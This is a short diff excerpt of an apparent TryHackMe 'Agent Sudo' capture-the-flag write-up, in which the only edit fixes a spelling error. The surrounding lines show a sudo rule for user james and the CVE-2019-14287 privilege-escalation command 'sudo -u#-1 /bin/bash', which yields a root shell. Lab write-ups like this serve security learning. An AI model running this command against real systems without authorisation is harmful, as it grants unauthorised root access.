CptHilda0079/CptHilda0079.github.io/_posts/2024-01-07-TryHackMe-Agent_Sudo.md

 User james may run the following commands on agent-sudo:
   (ALL, !root) /bin/bash
 ```
-(ALL, !root) /bin/bash looks promicing.
+(ALL, !root) /bin/bash looks promising.
 Finding some information on this command we come across https://www.exploit-db.com/exploits/47502 with CVE: 2019-14287.
 This vulnerability can be exploited using
 ```
 sudo -u#-1 /bin/bash
 ```